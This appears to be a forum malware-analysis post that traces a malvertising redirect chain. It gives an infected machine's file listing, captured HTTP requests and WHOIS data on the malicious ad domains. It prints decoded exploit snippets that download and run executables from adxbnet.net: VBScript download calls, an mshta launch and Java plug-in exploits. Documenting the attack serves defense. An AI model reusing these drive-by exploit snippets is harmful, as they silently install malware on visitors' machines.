Date: 5/8/2007 12:02 PM
Size: 63,004 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANKRNL.DLL
Date: 11/23/2007 4:47 PM
Size: 293,888 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANMCR1.DLL
Date: 5/8/2007 12:08 PM
Size: 200,849 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANOTHR.DLL
Date: 5/8/2007 12:03 PM
Size: 40,707 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANSCR.DLL
Date: 5/8/2007 11:57 AM
Size: 276,532 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANTOOL.DLL
Date: 5/8/2007 12:03 PM
Size: 114,320 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANTROJ.DLL
Date: 5/8/2007 12:03 PM
Size: 1,045,102 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANWIN1.DLL
Date: 5/8/2007 12:04 PM
Size: 836,351 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNACPU.DLL
Date: 5/8/2007 12:04 PM
Size: 9,728 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNADBX.DLL
Date: 5/8/2007 12:10 PM
Size: 286,720 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\unamscan.dll
Date: 5/8/2007 12:10 PM
Size: 47,616 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNMIME.DLL
Date: 5/8/2007 12:04 PM
Size: 44,202 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNPACK.DLL
Date: 5/8/2007 12:10 PM
Size: 331,275 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNPACKS.DLL
Date: 5/8/2007 12:04 PM
Size: 373,419 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNPACKS2.DLL
Date: 5/8/2007 12:06 PM
Size: 73,091 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNPEPACK.DLL
Date: 5/8/2007 12:04 PM
Size: 69,211 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\vbpv.dat
Date: 5/8/2007 12:12 PM
Size: 10 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate\UA27601.DLL
Date: 5/8/2007 11:57 AM
Size: 113,369 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate\UA27602.DLL
Date: 5/8/2007 11:56 AM
Size: 153,123 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate\UA27603.DLL
Date: 5/8/2007 11:56 AM
Size: 165,473 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate\UA27604.DLL
Date: 5/8/2007 11:56 AM
Size: 170,921 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate\UADAILY.DLL
Date: 5/8/2007 11:55 AM
Size: 65,256 bytes
c:\Program Files\TrustedAntivirus\Graphics\cross.gif
Date: 2/7/2006 11:40 AM
Size: 1,681 bytes
c:\Program Files\TrustedAntivirus\Graphics\ga6p.gif
Date: 12/15/2006 12:24 PM
Size: 4,151 bytes
c:\Program Files\TrustedAntivirus\Graphics\kb.url
Date: 3/6/2008 11:02 PM
Size: 74 bytes
c:\Program Files\TrustedAntivirus\Graphics\main.ico
Date: 11/24/2006 7:00 PM
Size: 3,774 bytes
c:\Program Files\TrustedAntivirus\Graphics\mini.ico
Date: 11/24/2006 6:11 PM
Size: 28,646 bytes
c:\Program Files\TrustedAntivirus\Graphics\Online.url
Date: 3/6/2008 11:02 PM
Size: 74 bytes
c:\Program Files\TrustedAntivirus\Graphics\rm.url
Date: 3/6/2008 11:02 PM
Size: 62 bytes
c:\Program Files\TrustedAntivirus\Graphics\support.ico
Date: 12/16/2005 11:02 AM
Size: 25,214 bytes
c:\Program Files\TrustedAntivirus\Graphics\Support.url
Date: 3/6/2008 11:02 PM
Size: 74 bytes
c:\Program Files\TrustedAntivirus\Graphics\uninstall.ico
Date: 10/6/2005 12:09 PM
Size: 1,406 bytes
c:\Program Files\TrustedAntivirus\LA\lapv.dat
Date: 3/6/2008 11:02 PM
Size: 3 bytes
c:\Program Files\TrustedAntivirus\LA\License.rtf
Date: 3/6/2008 11:01 PM
Size: 10,817 bytes
c:\Program Files\TrustedAntivirus\Tools\pblock.dll
Date: 11/27/2007 5:30 PM
Size: 222,208 bytes
c:\Program Files\TrustedAntivirus\Tools\sbiebho.dll
Date: 11/27/2007 5:31 PM
Size: 1,102,848 bytes
c:\Program Files\TrustedAntivirus\Up\ASupdater.dat
Date: 3/6/2008 11:02 PM
Size: 359 bytes
c:\Program Files\TrustedAntivirus\Up\gup.exe
Date: 11/7/2007 6:17 PM
Size: 716,800 bytes
c:\Program Files\TrustedAntivirus\Up\PGupdater.dat
Date: 3/6/2008 11:02 PM
Size: 359 bytes
c:\Program Files\TrustedAntivirus\Up\UBupdater.dat
Date: 3/6/2008 11:02 PM
Size: 359 bytes
c:\Program Files\TrustedAntivirus\Up\up.dat
Date: 3/6/2008 11:02 PM
Size: 41 bytes
c:\Program Files\TrustedAntivirus\Up\updater.dat
Date: 3/6/2008 11:02 PM
Size: 259 bytes
c:\Temp\txNog4220.exe
Date: 3/6/2008 10:40 PM
Size: 212,118 bytes
c:\Temp\1cb\syscheck.log
Date: 1/9/2008 6:44 AM
Size: 28,747 bytes
c:\Temp\sanR24\lDii.log
Date: 3/6/2008 10:41 PM
Size: 1,858 bytes
c:\WINDOWS\17PHolmes572.exe
Date: 3/6/2008 10:46 PM
Size: 37,376 bytes
c:\WINDOWS\mrofinu1000106.exe
Date: 3/6/2008 10:47 PM
Size: 37,376 bytes
c:\WINDOWS\mrofinu572.exe.tmp
Date: 3/6/2008 10:41 PM
Size: 37,376 bytes
c:\WINDOWS\uninstall_nmon.vbs
Date: 1/3/2006 5:45 PM
Size: 1,989 bytes
c:\WINDOWS\Downloaded Program Files\UGA6P_0001_N122M2802NetInstaller.exe
Date: 2/28/2008 4:57 PM
Size: 185,344 bytes
c:\WINDOWS\S0xZ\asappsrv.dll
Date: 8/2/2005 4:46 PM
Size: 187,904 bytes
c:\WINDOWS\S0xZ\command.exe
Date: 8/2/2005 4:58 PM
Size: 293,888 bytes
c:\WINDOWS\S0xZ\mXUt.vbs
Date: 7/29/2005 4:24 PM
Size: 472 bytes
c:\WINDOWS\system32\atmtd.dll
Date: 3/6/2008 10:50 PM
Size: 687,592 bytes
c:\WINDOWS\system32\atmtd.dll._
Date: 3/6/2008 10:50 PM
Size: 687,592 bytes
c:\WINDOWS\system32\ddcdbxu.dll
Date: 3/6/2008 10:49 PM
Size: 36,352 bytes
c:\WINDOWS\system32\fccbbya.dll
Date: 3/6/2008 10:39 PM
Size: 36,352 bytes
c:\WINDOWS\system32\jkkihgg.dll
Date: 3/6/2008 10:45 PM
Size: 36,352 bytes
c:\WINDOWS\system32\khfcb.dll
Date: 3/6/2008 10:44 PM
Size: 332,800 bytes
c:\WINDOWS\system32\MSINET.DEP
Date: 6/18/1998 5:00 AM
Size: 2,407 bytes
c:\WINDOWS\system32\MSINET.oca
Date: 4/26/2007 6:30 AM
Size: 29,184 bytes
c:\WINDOWS\system32\MSINET.OCX
Date: 6/24/1998 5:00 AM
Size: 115,016 bytes
c:\WINDOWS\system32\msnav32.ax
Date: 3/6/2008 10:47 PM
Size: 32 bytes
c:\WINDOWS\system32\pac.txt
Date: 9/24/2007 2:05 AM
Size: 279,600 bytes
c:\WINDOWS\system32\qomjgfg.dll
Date: 3/6/2008 10:45 PM
Size: 36,352 bytes
c:\WINDOWS\system32\tuvvtrp.dll
Date: 3/6/2008 10:45 PM
Size: 36,352 bytes
c:\WINDOWS\system32\urqommk.dll
Date: 3/6/2008 10:48 PM
Size: 36,352 bytes
c:\WINDOWS\system32\ax9\np89104.exe
Date: 2/7/2008 11:07 PM
Size: 136,111 bytes
c:\WINDOWS\system32\bv2\renabcom4.exe
Date: 2/14/2008 4:42 PM
Size: 49,152 bytes
c:\WINDOWS\system32\drivers\dhlp.sys
Date: 3/6/2008 11:02 PM
Size: 46,592 bytes
c:\WINDOWS\system32\ev4\philcom3.exe
Date: 8/14/2007 11:22 PM
Size: 25,105 bytes
c:\WINDOWS\system32\iDlo01\iDlo011065.exe
Date: 2/24/2008 8:45 AM
Size: 32,768 bytes
c:\WINDOWS\Temp\cc12.tmp
Date: 3/6/2008 11:07 PM
Size: 0 bytes

Adverts ? No thanks !
Kimberly

New domains - placeholders


The redirect also comes through the combination of www.axill.com & ad2.adecn.com.

Placeholder.

www.awltovhc.net

CODE
GET http://www.awltovhc.net/placeholder-1701629-86358216?atype=b0&pid=108459 HTTP/1.1
Accept: */*
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1331648&tid=86353614
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.awltovhc.net
Proxy-Connection: Keep-Alive
______________________________

Iframes.

The 3 links still contain obfuscated scripts & exploits, slightly different from those above but with the same results. They can be safely viewed using a sniffer. I will only post the decoded parts.

CODE
GET http://adxbnet.net/code/smain.php?scout=acxcrds HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1331648&tid=86353614
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adxbnet.net
Proxy-Connection: Keep-Alive

CODE
' Decoded fragment quoted from the captured page (analysis only). Two calls to a
' page-defined helper, DownExRdsDsc (its body is not shown here), each given a
' download URL and a local file name; the same xrun.exe / xpre.exe pair recurs in
' the later Java-plugin snippets, so these URLs are the artefact to look for in
' proxy or sniffer logs.
Call DownExRdsDsc("http://adxbnet.net/xrun.exe", "xrun.exe")
Call DownExRdsDsc("http://adxbnet.net/xpre.exe", "xpre.exe")
CODE
GET http://adxbnet.net/code/smain.php?scout=acxcobj HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1331648&tid=86353614
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adxbnet.net
Proxy-Connection: Keep-Alive

CODE
if(b) { try { b.run("mshta http://adxbnet.net/code/srun.php", 0); }catch(e){} }
...
Call DownExRdsDsc("http://adxbnet.net/xrun.exe", "xrun.exe")
Call DownExRdsDsc("http://adxbnet.net/xpre.exe", "xpre.exe")
CODE
GET http://adxbnet.net/code/smain.php?scout=jvcxeng HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1331648&tid=86353614
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adxbnet.net
Proxy-Connection: Keep-Alive

CODE
// SJ_SECMAN INVOKE
// Decoded exploit snippet quoted from the captured page (analysis only).
// The whole body sits in one try/catch whose catch discards the error, so a
// failed attempt produces no visible symptom in the browser; the observable
// trace is the network activity toward the two URLs in `sda`.
function sjvmsec() { try {
// Semicolon-separated list of executables to fetch; identical to the pair in
// the VBScript DownExRdsDsc calls above, so this string is a reliable
// detection artefact for the whole kit.
var sda="http://adxbnet.net/xrun.exe;http://adxbnet.net/xpre.exe";
// Reflective class lookups through `jvmsec`, an applet/LiveConnect object that
// is defined outside this snippet. The three names suggest an attempt against
// the Java plug-in's LiveConnect security checks -- TODO confirm against the
// applet bytes, which are not shown here.
var con=jvmsec.getClass().forName("sun.plugin.liveconnect.SecureInvocation");
var sys=jvmsec.getClass().forName("java.lang.System");
var sec=jvmsec.getClass().forName("java.lang.SecurityManager");
// The Class objects and the URL list are handed to the applet; what `main`
// does with them is only visible in the applet itself.
jvmsec.main(con, sys, sec, sda);
} catch(e) {} }

// SJ_USAFE INVOKE
// Decoded exploit snippet quoted from the captured page (analysis only).
// Second variant of the same download step, this time through `jvmusafe`, an
// applet object defined outside this snippet. As with sjvmsec, the catch
// swallows every error, so failure is silent.
function sjvmusaf() { try {
// Same two download URLs as in sjvmsec.
var sda = "http://adxbnet.net/xrun.exe;http://adxbnet.net/xpre.exe";
// Reflective handle on sun.misc.Unsafe obtained via the applet's class loader.
var ucl = jvmusafe.getClass().forName("sun.misc.Unsafe");
var umt = ucl.getMethod("getUnsafe", null);
var usf = umt.invoke(umt, null);
jvmusafe.main(usf);
// A class named "vlocal" is defined from bytes the applet carries
// (jvmusafe.bclass / jvmusafe.classsz); its contents are not visible here.
var dcl = usf.defineClass("vlocal", jvmusafe.bclass, 0, jvmusafe.classsz);
// allocateInstance creates the object without running any constructor.
var dcd = usf.allocateInstance(dcl);
// The defined class receives the URL list; its behaviour lives in the class
// bytes, so the two URLs remain the only artefact observable from the page.
dcd.vload(usf, sda);
} catch(d) {} }
______________________________

Banner.

85.17.162.100/banner/mp3downloads.jpg
IPB Image
______________________________

adxbnet.net - 83.216.217.242

ICANN Registrar: MONIKER ONLINE SERVICES, INC.
Created: 2008-05-26
Expires: 2009-05-26
Registrar Status: clientDeleteProhibited
Registrar Status: clientTransferProhibited
Registrar Status: clientUpdateProhibited
Name Server: NS1.DOMAINSERVICE.COM (has 361,990 domains)
Name Server: NS2.DOMAINSERVICE.COM
Name Server: NS3.DOMAINSERVICE.COM
Name Server: NS4.DOMAINSERVICE.COM
Whois Server: whois.moniker.com

Server Type: Apache/2.2.3 (CentOS)
IP Address: 83.216.217.242
IP Location - Niederosterreich - Baden - Colobase Customer Allocation
Reverse IP: 20 other sites hosted on this server.

Domain Name: ADXBNET.NET

Registrant [1398527]:
Moniker Privacy Services
20 SW 27th Ave.
Suite 201
Pompano Beach
FL
33069
US

Websites.
  1. Adoutfer.net
  2. Adpopserve.net
  3. Adpopshow.net
  4. Adpopups.net
  5. Adxanet.net
  6. Adxbnet.net
  7. Adxrnet.net
  8. Awofkwy.net
  9. Especialads.com
  10. Iefjios.net
  11. Kasdfps.net
  12. Kiafjwo.net
  13. Netaddirect.com
  14. Netcrefer.net
  15. Netcshow.net
  16. Netsdir.net
  17. Snipenet.net
  18. Snipernet.biz
  19. Snipernet.us
  20. Sxload.net
  21. Xpseek.net
Iefjios.net is currently also being used as a placeholder.
______________________________

ad.adrefer.net - 85.17.162.100

ICANN Registrar: MONIKER ONLINE SERVICES, INC.
Created: 2007-05-02
Expires: 2009-05-02
Registrar Status: clientDeleteProhibited
Registrar Status: clientTransferProhibited
Registrar Status: clientUpdateProhibited
Name Server: NS1.DOMAINSERVICE.COM (has 361,990 domains)
Name Server: NS2.DOMAINSERVICE.COM
Name Server: NS3.DOMAINSERVICE.COM
Name Server: NS4.DOMAINSERVICE.COM
Whois Server: whois.moniker.com

Server Type: Apache/2.0.52 (CentOS)
IP Address: 85.17.162.100
IP Location - Noord-holland - Amsterdam - Leaseweb
Reverse IP: 4 other sites hosted on this server

Domain Name: ADREFER.NET

Registrant [693328]:
Moniker Privacy Services
20 SW 27th Ave.
Suite 201
Pompano Beach
FL
33069
US

Websites.
  1. Adrefer.net
  2. Awltovhc.net
  3. Ikwlkad.net
  4. Iwdjiamk.net
  5. Tqlkg.net
______________________________

adecn.com (Microsoft) has been notified.


Note: Thanks for the PM about adxbnet.net and ikwlkad.net